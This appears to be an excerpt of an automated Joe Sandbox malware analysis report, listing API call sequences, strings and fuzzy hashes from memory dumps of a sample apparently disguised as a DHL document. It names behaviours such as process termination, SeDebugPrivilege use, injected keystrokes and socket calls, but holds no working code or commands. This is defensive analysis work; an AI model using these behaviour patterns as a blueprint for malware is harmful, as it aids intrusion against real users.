                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4090791747-0
                                                                                    • Opcode ID: 3b6c47472b3c614d62d1c9da804866ef262af99cdcadd4bde943ab7853154674
                                                                                    • Instruction ID: 6c9a37633c5cb5787bd1d265bdeb1529a3074a523598c9133aeae61bc90e0d82
                                                                                    • Opcode Fuzzy Hash: 3b6c47472b3c614d62d1c9da804866ef262af99cdcadd4bde943ab7853154674
                                                                                    • Instruction Fuzzy Hash: 9EE188316042109FC714EF24D895B6ABBF1FF85314F14896DFA998B2A2DB35DC81CB52
                                                                                    APIs
                                                                                      • Part of subcall function 0081466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00813697,?), ref: 0081468B
                                                                                      • Part of subcall function 0081466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00813697,?), ref: 008146A4
                                                                                      • Part of subcall function 00814A31: GetFileAttributesW.KERNEL32(?,0081370B), ref: 00814A32
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00814D40
                                                                                    • _wcscmp.LIBCMT ref: 00814D5A
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00814D75
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 793581249-0
                                                                                    • Opcode ID: a4cf15bf0aaa7147136f1003672476324f25bc4b7b75e67f826316ad57b61339
                                                                                    • Instruction ID: 93034731dbd75544020b008720da62d6b326270255556f84b8cf2b9a0ebeeae7
                                                                                    • Opcode Fuzzy Hash: a4cf15bf0aaa7147136f1003672476324f25bc4b7b75e67f826316ad57b61339
                                                                                    • Instruction Fuzzy Hash: 915141B25083859BC724EB64D8859DFB3ECEF84350F50092FF289D3152EE35A689C766
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008386FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: fcff63ff8912cc1fc6c0c5887e37f6a433605b01702291743b366f69de262101
                                                                                    • Instruction ID: a8ca7d420274652eb6b0ea30af498afa5906d522b7cae9e399b1ef905e6692a8
                                                                                    • Opcode Fuzzy Hash: fcff63ff8912cc1fc6c0c5887e37f6a433605b01702291743b366f69de262101
                                                                                    • Instruction Fuzzy Hash: 7751AF30500348FEEF249B28CC8AFA93BA5FB95354F604525FA15E61A1DFB5A980CBC1
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007EC2F7
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007EC319
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007EC331
                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007EC34F
                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007EC370
                                                                                    • DestroyIcon.USER32(00000000), ref: 007EC37F
                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007EC39C
                                                                                    • DestroyIcon.USER32(?), ref: 007EC3AB
                                                                                      • Part of subcall function 0083A4AF: DeleteObject.GDI32(00000000), ref: 0083A4E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                    • String ID:
                                                                                    • API String ID: 2819616528-0
                                                                                    • Opcode ID: 2252ff697cece60cedcd5b218debb1249e625e9162fd304bf4e49120bf52d7b6
                                                                                    • Instruction ID: e419f3d939890afa5f44fad896073a511661f364fd15a3f2af61f5e16032851a
                                                                                    • Opcode Fuzzy Hash: 2252ff697cece60cedcd5b218debb1249e625e9162fd304bf4e49120bf52d7b6
                                                                                    • Instruction Fuzzy Hash: 85517A74A01205EFDB24DF65CC45FAB3BA5FB58310F104528F906972A1EBB4EC92DB91
                                                                                    APIs
                                                                                      • Part of subcall function 0080A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0080A84C
                                                                                      • Part of subcall function 0080A82C: GetCurrentThreadId.KERNEL32 ref: 0080A853
                                                                                      • Part of subcall function 0080A82C: AttachThreadInput.USER32(00000000,?,00809683,?,00000001), ref: 0080A85A
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 0080968E
                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008096AB
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008096AE
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008096B7
                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008096D5
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008096D8
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 008096E1
                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008096F8
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008096FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2014098862-0
                                                                                    • Opcode ID: c980f29a3ce3a2c09dbcbeea3dae899141b993c0908a5f914562a2b97d9d2266
                                                                                    • Instruction ID: b0f42012b4a2566e4f73724bfeb0e1a174a09cceb8c0b9993b83b6ade9125200
                                                                                    • Opcode Fuzzy Hash: c980f29a3ce3a2c09dbcbeea3dae899141b993c0908a5f914562a2b97d9d2266
                                                                                    • Instruction Fuzzy Hash: 8A11CEB1910618BEF6106B64DC8AF6A3A2DFB8C751F100825F344AB0E2C9F35C10DAE4
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0080853C,00000B00,?,?), ref: 0080892A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,0080853C,00000B00,?,?), ref: 00808931
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0080853C,00000B00,?,?), ref: 00808946
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0080853C,00000B00,?,?), ref: 0080894E
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0080853C,00000B00,?,?), ref: 00808951
                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0080853C,00000B00,?,?), ref: 00808961
                                                                                    • GetCurrentProcess.KERNEL32(0080853C,00000000,?,0080853C,00000B00,?,?), ref: 00808969
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,0080853C,00000B00,?,?), ref: 0080896C
                                                                                    • CreateThread.KERNEL32(00000000,00000000,00808992,00000000,00000000,00000000), ref: 00808986
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1957940570-0
                                                                                    • Opcode ID: 1303fc565fcea3727c78a24d68530751d61e1ac05c7046dda0ce9b45f042fa22
                                                                                    • Instruction ID: 2b8cf0203d7003575314cb5b77aa62f0084cb4e8cf6b6fc101e8e04cc3f45ada
                                                                                    • Opcode Fuzzy Hash: 1303fc565fcea3727c78a24d68530751d61e1ac05c7046dda0ce9b45f042fa22
                                                                                    • Instruction Fuzzy Hash: AD01AC75640304FFE611ABA5EC49F6B3B6CFB89711F404421FB05DB1A1CA7498049A60
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                    • API String ID: 0-572801152
                                                                                    • Opcode ID: 2f8b9cad2535c4126ace3b52e4718b1fdecdc6371341d5190121ee939ecd0d5a
                                                                                    • Instruction ID: 7c8c14d58cd3b5e3ff70c44512892601c5eee57f94c3b9415f1d71eaf314dda8
                                                                                    • Opcode Fuzzy Hash: 2f8b9cad2535c4126ace3b52e4718b1fdecdc6371341d5190121ee939ecd0d5a
                                                                                    • Instruction Fuzzy Hash: 44C1C571A0022A9FDF10DF98E884BAEB7F5FF48314F158469E945E7281E7709D85CB90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                    • API String ID: 2862541840-625585964
                                                                                    • Opcode ID: 53b69e9e6c7f97a4ded3e8e2dcb9b3285d2f11f7575c1cbc01aa428d4487c8e6
                                                                                    • Instruction ID: e74b51ef94beef97767cddc8d3de1e94dff988b152f0b23c7153cc45b0f17aea
                                                                                    • Opcode Fuzzy Hash: 53b69e9e6c7f97a4ded3e8e2dcb9b3285d2f11f7575c1cbc01aa428d4487c8e6
                                                                                    • Instruction Fuzzy Hash: E291AD71A00229EBDF20CFA5E848FAEB7B8FF45714F108119F955EB280D7709985CBA0
                                                                                    APIs
                                                                                      • Part of subcall function 0080710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?,?,00807455), ref: 00807127
                                                                                      • Part of subcall function 0080710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?), ref: 00807142
                                                                                      • Part of subcall function 0080710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?), ref: 00807150
                                                                                      • Part of subcall function 0080710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?), ref: 00807160
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00829806
                                                                                    • _memset.LIBCMT ref: 00829813
                                                                                    • _memset.LIBCMT ref: 00829956
                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00829982
                                                                                    • CoTaskMemFree.OLE32(?), ref: 0082998D
                                                                                    Strings
                                                                                    • NULL Pointer assignment, xrefs: 008299DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1300414916-2785691316
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00836E24
• SendMessageW.USER32(?,00001036,00000000,?), ref: 00836E38
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00836E52
• _wcscat.LIBCMT ref: 00836EAD
• SendMessageW.USER32(?,00001057,00000000,?), ref: 00836EC4
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00836EF2
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
APIs
  • Part of subcall function 00813C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00813C7A
  • Part of subcall function 00813C55: Process32FirstW.KERNEL32(00000000,?), ref: 00813C88
  • Part of subcall function 00813C55: CloseHandle.KERNEL32(00000000), ref: 00813D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0082E9A4
• GetLastError.KERNEL32 ref: 0082E9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0082E9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0082EA63
• GetLastError.KERNEL32(00000000), ref: 0082EA6E
• CloseHandle.KERNEL32(00000000), ref: 0082EAA3
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00813033
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00814312
• LoadStringW.USER32(00000000), ref: 00814319
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0081432F
• LoadStringW.USER32(00000000), ref: 00814336
• _wprintf.LIBCMT ref: 0081435C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0081437A
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00814357
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
APIs
  • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
• GetSystemMetrics.USER32(0000000F), ref: 0083D47C
• GetSystemMetrics.USER32(0000000F), ref: 0083D49C
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0083D6D7
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0083D6F5
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0083D716
• ShowWindow.USER32(00000003,00000000), ref: 0083D735
• InvalidateRect.USER32(?,00000000,00000001), ref: 0083D75A
• DefDlgProcW.USER32(?,00000005,?,?), ref: 0083D77D
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007EC1C7,00000004,00000000,00000000,00000000), ref: 007B2ACF
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007EC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 007B2B17
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007EC1C7,00000004,00000000,00000000,00000000), ref: 007EC21A
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007EC1C7,00000004,00000000,00000000,00000000), ref: 007EC286
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 008170DD
  • Part of subcall function 007D0DB6: std::exception::exception.LIBCMT ref: 007D0DEC
  • Part of subcall function 007D0DB6: __CxxThrowException@8.LIBCMT ref: 007D0E01
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00817114
• EnterCriticalSection.KERNEL32(?), ref: 00817130
• _memmove.LIBCMT ref: 0081717E
• _memmove.LIBCMT ref: 0081719B
• LeaveCriticalSection.KERNEL32(?), ref: 008171AA
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008171BF
• InterlockedExchange.KERNEL32(?,000001F6), ref: 008171DE
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
APIs
• DeleteObject.GDI32(00000000), ref: 008361EB
• GetDC.USER32(00000000), ref: 008361F3
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 008361FE
• ReleaseDC.USER32(00000000,00000000), ref: 0083620A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00836246
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00836257
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0083902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00836291
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008362B1
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
                                                                                    • Opcode ID: f1113bfa186be38a77e4302f58646d257e2ea51d1e7e7b0ad2e47de3cbb3ca26
                                                                                    • Instruction ID: 7baf69f37036648ca608910f180f27e68a8c6dc749ff57bed47e6517402d070e
                                                                                    • Opcode Fuzzy Hash: f1113bfa186be38a77e4302f58646d257e2ea51d1e7e7b0ad2e47de3cbb3ca26
                                                                                    • Instruction Fuzzy Hash: B5317C72101210BFEB118F14CC8AFAB3BA9FF99761F054065FE08DA292D6B59851CBA0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 2931989736-0
                                                                                    • Opcode ID: f87058cea6966600073fd5679dabf94029dcc03d0567b15f69a95c58acbc4fc3
                                                                                    • Instruction ID: e574831604a1a3fd6d562d1d629bc8ebb58a22c22c6a2183dc38717c68b6b2b3
                                                                                    • Opcode Fuzzy Hash: f87058cea6966600073fd5679dabf94029dcc03d0567b15f69a95c58acbc4fc3
                                                                                    • Instruction Fuzzy Hash: 1B21CF6160524EBBE24466119D92FBB73ACFF14368F484021FD04D6BC3FB2CDE1182A1
                                                                                    APIs
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                      • Part of subcall function 007CFC86: _wcscpy.LIBCMT ref: 007CFCA9
                                                                                    • _wcstok.LIBCMT ref: 0081EC94
                                                                                    • _wcscpy.LIBCMT ref: 0081ED23
                                                                                    • _memset.LIBCMT ref: 0081ED56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                    • String ID: X
                                                                                    • API String ID: 774024439-3081909835
                                                                                    • Opcode ID: 71384f6d8157616e6172db7701297529a56b123644da23775067d63d58e3526f
                                                                                    • Instruction ID: 03e28a293f8b9fcfb0d7f10dcea6524669569eb5a95e1fe3010132126ec52f05
                                                                                    • Opcode Fuzzy Hash: 71384f6d8157616e6172db7701297529a56b123644da23775067d63d58e3526f
                                                                                    • Instruction Fuzzy Hash: BFC14A71608241DFC764EF24C889A9AB7E4FF85314F04492DF999DB2A2DB34EC45CB92
                                                                                    APIs
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00826C00
                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00826C21
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00826C34
                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 00826CEA
                                                                                    • inet_ntoa.WSOCK32(?), ref: 00826CA7
                                                                                      • Part of subcall function 0080A7E9: _strlen.LIBCMT ref: 0080A7F3
                                                                                      • Part of subcall function 0080A7E9: _memmove.LIBCMT ref: 0080A815
                                                                                    • _strlen.LIBCMT ref: 00826D44
                                                                                    • _memmove.LIBCMT ref: 00826DAD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                    • String ID:
                                                                                    • API String ID: 3619996494-0
                                                                                    • Opcode ID: 14aca5c32cb3efa2017e7bcbb460e69625e4435642411d67de803376120959d7
                                                                                    • Instruction ID: 403fe96eab7d0ded04efdbf837d878e8079022f6acc4307918aa4084378cc752
                                                                                    • Opcode Fuzzy Hash: 14aca5c32cb3efa2017e7bcbb460e69625e4435642411d67de803376120959d7
                                                                                    • Instruction Fuzzy Hash: 1781E271204314ABC710EB24DC86FABB7A8FF84714F14491DFA55DB292EA75ED40CB92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
